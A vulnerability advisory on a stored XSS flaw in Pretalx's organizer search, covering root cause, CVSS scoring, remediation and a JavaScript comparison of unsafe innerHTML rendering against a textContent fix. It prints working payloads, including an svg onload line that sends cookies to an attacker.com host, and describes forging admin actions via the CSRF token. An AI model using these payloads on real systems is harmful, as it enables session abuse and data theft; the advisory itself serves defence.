Apr 19, 2026
A stored XSS vulnerability in the Pretalx search typeahead feature allows low-privileged users to execute arbitrary JavaScript in the context of administrative organizer accounts, enabling session hijacking and unauthorized administrative actions.
Pretalx versions prior to 2026.1.0 contain a high-severity stored Cross-Site Scripting (XSS) vulnerability within the organizer-facing search interface. Low-privileged users, such as speakers or proposal submitters, can inject malicious JavaScript into their profiles or submissions. When an organizer searches for these records, the application insecurely renders the results using `innerHTML`, leading to arbitrary script execution in the organizer's browser.
Pretalx is an open-source conference planning tool that provides platforms for call for papers (CfP), schedule management, and speaker communication. The platform defines distinct privilege levels, separating unprivileged submitters or speakers from highly privileged conference organizers and administrators. The organizer interface includes a typeahead search functionality designed to quickly locate submissions, speaker profiles, and user accounts.
The vulnerability, tracked as GHSA-CJCX-JFP2-F7M2, is a Stored Cross-Site Scripting (XSS) flaw located in this organizer search feature. It occurs because the frontend application fails to properly sanitize user-supplied data before rendering it in the DOM. This constitutes a CWE-79 violation: Improper Neutralization of Input During Web Page Generation.
By exploiting this vulnerability, an attacker with minimal privileges can store a malicious payload within standard application fields, such as their display name or submission title. When a privileged organizer interacts with the search bar and the attacker's record is returned as a match, the malicious payload executes automatically within the organizer's session context.
The root cause of this vulnerability lies in the frontend JavaScript component responsible for rendering search results in the backend interface. Specifically, the flaw is located within src/pretalx/static/orga/js/base.js. This script handles the asynchronous typeahead search feature utilized by conference organizers.
When an organizer types a query, the frontend queries a backend endpoint to retrieve matching user names, emails, speaker display names, and submission titles. The frontend script iterates through the JSON response and constructs DOM elements for the dropdown menu. During this process, the script insecurely uses the innerHTML property to insert the returned text strings directly into the DOM.
Assigning untrusted data to innerHTML hands the string to the browser's HTML parser, so any markup in it becomes live DOM nodes. A `<script>` element inserted this way is not executed (the HTML specification marks scripts created by innerHTML as non-executable), but event-handler attributes are honoured: an onerror handler on an `<img>` whose source fails to load, or an onload handler on an `<svg>`, fires as soon as the element enters the document. That is why practical payloads for this bug use those attributes rather than script tags. The backend API does not HTML-encode these fields before returning them, relying entirely on the frontend to render them safely.
Exploitation requires the attacker to possess an account on the target Pretalx instance, which is generally open to the public during a Call for Papers phase. The attacker logs in and creates a new proposal or updates their user profile. During this step, the attacker injects a standard XSS vector into a targeted field, such as the Submission Title.
A typical payload looks like `<img src=x onerror=alert(document.cookie)>` or `<svg onload=fetch('https://attacker.com/?cookie='+document.cookie)>`. The backend stores this string unmodified; that in itself is normal, since the defect is the missing output encoding at render time, not the storage. The attacker then waits for an organizer to use the backend search. The payload is entirely passive until the victim's search returns the record.
When the organizer types a substring that matches the attacker's manipulated record, the API returns the malicious payload in the search results. The vulnerable JavaScript in base.js writes this payload to the DOM via innerHTML. The browser immediately parses the injected HTML, encounters the error or load event, and executes the embedded JavaScript within the origin of the Pretalx application.
The CVSS v3.1 vector for this vulnerability is CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, giving a base score of 8.7 (High). Scope is Changed because the payload is stored by the application but executes in the organizer's browser. The impact is severe because of the privilege gap between attacker and victim: a submitter-level account gains organizer-level capabilities, not by stealing the session outright but by running code inside the organizer's authenticated session.
Once the payload executes, the attacker's script operates with the full privileges of the organizer's active session. The script can read any data accessible to the organizer, including sensitive reviewer notes, private speaker details, and financial data related to the conference. This data can be exfiltrated silently to an external server controlled by the attacker.
Furthermore, the script can issue arbitrary HTTP requests to the Pretalx backend on behalf of the organizer. Since the script runs within the same origin, it can read the application's CSRF token from the DOM and include it in POST requests. This allows the attacker to automate administrative actions, such as modifying the event schedule, deleting submissions, altering system configurations, or granting administrative access to the attacker's account.
The primary remediation is to upgrade the Pretalx installation to version 2026.1.0 or later. The patch modifies src/pretalx/static/orga/js/base.js to eliminate the use of innerHTML for search results. With textContent (or innerText) the returned strings are inserted as text nodes, so the browser never parses them as markup and the embedded event handlers are never created.
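The following is an added illustration, not code from Pretalx or from the advisory: it shows the innerHTML rendering pattern described in the root-cause section above next to a hardened renderer built from DOM nodes with textContent, which is the shape of the fix just described. The JSON field names (`kind`, `label`, `url`) and the sample response are constructed for the example, since the page does not show the real API schema. A minimal fake `document` is included only so the file runs under Node and the difference is visible in serialised output; in a browser, pass the real `document`. The href allow-list is an extra precaution of mine beyond the advisory's fix, relevant only if a URL field were ever user-supplied.

```javascript
// Added example (not Pretalx's code). Field names and sample data are assumed.

function makeFakeDocument() {
  // Serialises nodes the way a browser would: text set through textContent
  // is escaped, markup set through innerHTML is emitted verbatim (parsed).
  const esc = (s) => String(s)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
  class FakeNode {
    constructor(tag) {
      this.tag = tag; this.attrs = {}; this.children = [];
      this._text = ''; this._html = null;
    }
    setAttribute(name, value) { this.attrs[name] = String(value); }
    appendChild(child) { this.children.push(child); return child; }
    set textContent(v) { this._text = String(v); this._html = null; this.children = []; }
    get textContent() { return this._text; }
    set innerHTML(v) { this._html = String(v); this._text = ''; this.children = []; }
    get outerHTML() {
      const attrs = Object.entries(this.attrs)
        .map(([k, v]) => ` ${k}="${esc(v)}"`).join('');
      const inner = this._html !== null
        ? this._html
        : esc(this._text) + this.children.map((c) => c.outerHTML).join('');
      return `<${this.tag}${attrs}>${inner}</${this.tag}>`;
    }
  }
  return { createElement: (tag) => new FakeNode(tag) };
}

// The vulnerable pattern: untrusted fields concatenated into markup and
// assigned to innerHTML, so a label like <img src=x onerror=...> becomes a
// live element whose handler fires in the organizer's session.
function renderResultsUnsafe(doc, results) {
  const list = doc.createElement('ul');
  list.innerHTML = results
    .map((r) => `<li><a href="${r.url}">${r.label}</a> <span>${r.kind}</span></li>`)
    .join('');
  return list;
}

// Only accept site-relative paths or http(s) URLs; anything else (e.g. a
// javascript: URL) is replaced. Extra precaution, not part of the advisory.
function safeHref(url) {
  return /^(\/[^\/\\]|https?:\/\/)/.test(url) ? url : '#';
}

// Hardened form: build nodes with the DOM API and pass every untrusted
// string through textContent or setAttribute, never through innerHTML.
function renderResultsSafe(doc, results) {
  const list = doc.createElement('ul');
  for (const r of results) {
    const li = doc.createElement('li');
    const a = doc.createElement('a');
    a.setAttribute('href', safeHref(r.url));
    a.textContent = r.label;            // markup in the label stays text
    const kind = doc.createElement('span');
    kind.textContent = r.kind;
    li.appendChild(a);
    li.appendChild(kind);
    list.appendChild(li);
  }
  return list;
}

// Constructed sample search response (the real schema is not on the page).
const SAMPLE_RESULTS = [
  { kind: 'speaker', label: 'Jane Doe', url: '/orga/event/demo/speakers/1/' },
  { kind: 'submission',
    label: '<img src=x onerror=alert(document.cookie)>',
    url: '/orga/event/demo/submissions/ABC/' },
];

// Renders the same results both ways and returns the serialised markup.
function demo() {
  const doc = makeFakeDocument();
  return {
    unsafe: renderResultsUnsafe(doc, SAMPLE_RESULTS).outerHTML,
    safe: renderResultsSafe(doc, SAMPLE_RESULTS).outerHTML,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In the unsafe output the submission title appears as a real `<img>` element; in the safe output the same title is emitted as `&lt;img ...&gt;`, which a browser displays literally. Server-side HTML encoding of the API fields would be a reasonable second layer, but the frontend change alone closes the execution path.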
If immediate patching is not feasible, administrators can apply a manual mitigation by editing src/pretalx/static/orga/js/base.js in the installed package to replace the innerHTML assignments with text-node assignments (textContent). After the change, run the collectstatic management command so the updated asset is the one served to clients. Note that an edit to the installed package file is overwritten by the next upgrade, so it should be treated as a stopgap until 2026.1.0 is deployed.
As a temporary operational workaround, organizers can be instructed not to use the backend search bar until the instance is patched. This degrades the usability of the administrative interface but removes the only execution trigger the advisory describes. Flagging the session cookie HttpOnly (Django, on which Pretalx is built, does this for its session cookie by default) stops the payload from reading the session identifier through document.cookie, but it is not a fix: the script still runs inside the organizer's authenticated session, can read the CSRF token from the page and can issue requests on the organizer's behalf, so the actions described above remain possible.
| Product | Affected Versions | Fixed Version |
|---|---|---|
| pretalx/pretalx | < 2026.1.0 | 2026.1.0 |

| Attribute | Detail |
|---|---|
| Vulnerability Type | Stored Cross-Site Scripting (XSS) |
| CWE ID | CWE-79 |
| CVSS Score | 8.7 (High) |
| Attack Vector | Network |
| Privileges Required | Low (Submitter/Speaker) |
| User Interaction | Required (Organizer must search) |
| Exploit Status | Proof of Concept Available |
CWE-79 (Improper Neutralization of Input During Web Page Generation): The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.